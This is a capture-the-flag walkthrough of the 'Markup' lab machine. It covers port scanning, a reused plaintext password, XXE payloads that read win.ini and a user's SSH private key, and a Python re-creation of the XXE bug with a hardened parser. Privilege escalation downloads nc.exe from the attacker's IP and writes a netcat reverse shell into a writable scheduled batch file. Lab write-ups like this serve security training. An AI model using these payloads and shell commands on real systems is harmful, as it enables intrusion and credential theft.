Markup Walkthrough
After the Included walkthrough, here I am with Markup. Let's hack it and grab the flags.
As mentioned before, the Starting Point machines are a series of 9 machines rated "Very Easy" that are meant to be rooted in sequence. So before this box you should have completed the Included machine.
Enough talk, let's get started.
Disclaimer: no flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab them yourself.
00. Start Machine
To start the machine, just click on "Spawn Machine".
Then you can see the IP address of that machine.
Before enumerating, ping the IP address to check that the VPN is connected and the machine is up. Some machines drop ICMP echo requests at the firewall, so a failed ping does not always mean the box is down, but in most cases ping will succeed.
The ping reply comes back with TTL=127. Windows uses an initial TTL of 128 (Linux defaults to 64), and there is a single hop between us and the machine (the VPN gateway), which decrements it by one. So this is most likely a Windows machine.
01. Enumeration First
01.1 Fast ports scan
As usual, run a fast Nmap scan of all TCP ports to identify which ones are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.49
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Scan the full TCP port range (1-65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output:
Only a web server (80 and 443) and an SSH server (22) are open.
01.2 Run Nmap Scripting Engine
To get more detail, run the Nmap Scripting Engine together with version detection against the open ports only. Since we already know which ports are open, this targeted scan finishes quickly.
nmap -sV -sC -oN DetailPorts.nmap -p 22,80,443 10.10.10.49
As usual, I chose the web server as my first enumeration path, starting with port 80. Open a browser and navigate to http://10.10.10.49/
This time it is a MegaShopping login page. Again, it's time to try previously found passwords. Remember the SQL credentials we got from the Included machine? Let's try those first.
Daniel : >SNDv*2wzLWf
And they work on the first attempt.
Now take a moment to examine the site. While doing so, I found the way forward: this time it is XML external entity (XXE) injection. Let's look at it from the beginning.
Power up Burp Suite and examine all the requests. In particular, look at how the order submission function works.
It's an XML request, so that's where we start.
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. source
Now you have an idea of what XXE is. I took a sample payload from the same source, but since this is a Windows machine the file path has to be changed: C:\Windows\win.ini is a good first target because it exists on every Windows install and any user can read it. The final payload looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<order>
<quantity>
1
</quantity>
<item>
&xxe;
</item>
<address>
h4rithd.com
</address>
</order>
Send the request to the Repeater tab (Ctrl+R), switch to Repeater, replace the XML body with the payload above and click Send. You can also try placing &xxe; in the other elements (quantity and address), but only item reflects the entity's content in the response.
As you can see, the exploit works: the contents of win.ini come back in the response. So what can we do with this? We can read any file that the web server's service account is allowed to read. Time to enumerate again.
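To see what happens inside the server when &xxe; is expanded, here is an added example (my own code, not part of the original writeup and not MegaShopping's code) that re-creates the bug with Python's standard-library xml.sax parser. The same order XML is parsed twice: once with external general entities enabled, which is the vulnerable behaviour, and once with them disabled, which is the fix. The element names (order, quantity, item, address) are taken from the request above; the file it reads is a temporary file the example creates as a stand-in for C:\Windows\win.ini, and parse_order, xxe_order and demo are names I chose for the example.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class OrderHandler(handler.ContentHandler):
    """Collects the text inside each child element of <order>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        # Text produced by expanding an external entity arrives here exactly
        # like literal text, which is why the file contents land in <item>.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_order(xml_bytes, resolve_external_entities):
    """Parse an <order> document and return its fields as a dict.

    resolve_external_entities=True mirrors a server whose XML parser follows
    SYSTEM entities (the vulnerable setting); False is the hardened setting.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    order = OrderHandler()
    parser.setContentHandler(order)
    parser.parse(io.BytesIO(xml_bytes))
    return {name: text.strip() for name, text in order.fields.items()}


def xxe_order(file_uri, address="h4rithd.com"):
    """Build the order payload from the writeup with &xxe; in <item>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>\n'
        "<order>\n"
        "  <quantity>1</quantity>\n"
        "  <item>&xxe;</item>\n"
        f"  <address>{address}</address>\n"
        "</order>\n"
    ).encode("utf-8")


def demo():
    """Return (item text from the vulnerable parser, item text from the hardened one)."""
    # Constructed stand-in for C:\Windows\win.ini so the example runs on any OS
    # without touching a real system file.
    with tempfile.NamedTemporaryFile("w", suffix=".ini", delete=False) as tmp:
        tmp.write("; for 16-bit app support\n[fonts]\n[extensions]\n")
        target = pathlib.Path(tmp.name)
    try:
        # as_uri() gives file:///... just like file:///c:/windows/win.ini in the writeup
        payload = xxe_order(target.as_uri())
        leaked = parse_order(payload, resolve_external_entities=True)["item"]
        safe = parse_order(payload, resolve_external_entities=False)["item"]
    finally:
        target.unlink()
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser put this in <item>:\n" + leaked)
    print("hardened parser put this in <item>: " + repr(safe))
```

The hardened parser still accepts the DOCTYPE, it simply never opens the SYSTEM identifier, so the entity expands to nothing and the order is processed with an empty item; on a real server that is the difference between a file read and a harmless request.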
This machine has port 22 open. If we can grab an SSH private key, we can log in with it. Since we already know one username, Daniel, let's start with him. On Windows, OpenSSH keeps a user's keys in C:\Users\<username>\.ssh\, with id_rsa as the default RSA private key. Let's check whether we can grab it with the payload below.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///C:/Users/Daniel/.ssh/id_rsa"> ]>
<order>
<quantity>
1
</quantity>
<item>
&xxe;
</item>
<address>
h4rithd.com
</address>
</order>
The private key comes back in the response.
Copy it to our machine, restrict its permissions with chmod 600 id_rsa (ssh refuses to use a key file that other users can read), and connect as Daniel:
ssh -i id_rsa Daniel@10.10.10.49
We're in as Daniel. Let's grab the user flag.
03. Privilege Escalation
Again we have a Windows machine to escalate privileges on. The following links give good ideas for Windows privilege escalation.
While winPEAS runs in the background, I opened a second SSH session to enumerate manually and see what we can do. There I found a folder called Log-Management in the root of the C: drive.
Time for a quick look at what's inside.
The folder contains a batch file, job.bat. Can we read it? Yes, and its content shows that the script calls wevtutil.exe.
wevtutil | Enables you to retrieve information about event logs and publishers. You can also use this command to install and uninstall event manifests, to run queries, and to export, archive, and clear logs. source
From the script's content, it simply clears the event logs. What makes it interesting is not what it does but who runs it: a cleanup job like this is normally run on a schedule by a privileged account, so if we can control its contents we can run code as that account.
Let's look at the permissions on this file with the icacls command. icacls works from cmd as well, but I find it easier to continue in PowerShell from here, so just type powershell and hit Enter.
The output shows that the group BUILTIN\Users has full control (F) over the batch file.
Builtin\users are all the users that the OS creates when installing the OS including local accounts (e.g. guest, ASP.NET or IUSR_hostname). It also includes all the users created in the domain. Authenticated users are all users that belong to the domain and have credentials. source
Since that group has full control over the file and every local user (including Daniel) is a member of it, we can overwrite the batch file. Whatever we put in it will run with the privileges of the account that executes the scheduled job.
03.1 Getting the Reverse Shell
To get a reverse shell from that script we need a netcat binary on the box and then write our payload into the batch file. Serve nc.exe from our machine over HTTP on port 8888 (a Python web server is enough) and download it onto the Markup machine.
Navigate to C:\Users\Daniel\ and download it with PowerShell using the command below. Replace <YourIP> with your own address.
Powershell -c "IWR -useBasicParsing http://<YourIP>:8888/nc.exe -o nc.exe"
Then write the payload (a netcat reverse shell) into job.bat, overwriting its original content. Replace <YourIP> with your own address. Two things to watch: run this from a cmd.exe prompt rather than Windows PowerShell, because PowerShell's > writes the file as UTF-16 and cmd.exe will not execute that as a batch file; and keep the space before >, otherwise cmd.exe reads the trailing 8> as a file-handle redirection and leaves job.bat empty.
echo C:\Users\Daniel\nc.exe -e cmd.exe <YourIP> 7878 > C:\Log-Management\job.bat
Now start a netcat listener on port 7878 on our machine and wait for the scheduled task to run the script (on Windows this is a scheduled task, not a cron job).
When it connects back we have a shell as the account that runs the task, and we can grab the root flag.
On the Starting Point path, only two machines are left now.
I'll see you on the next box, Guard.
Find me on @twitter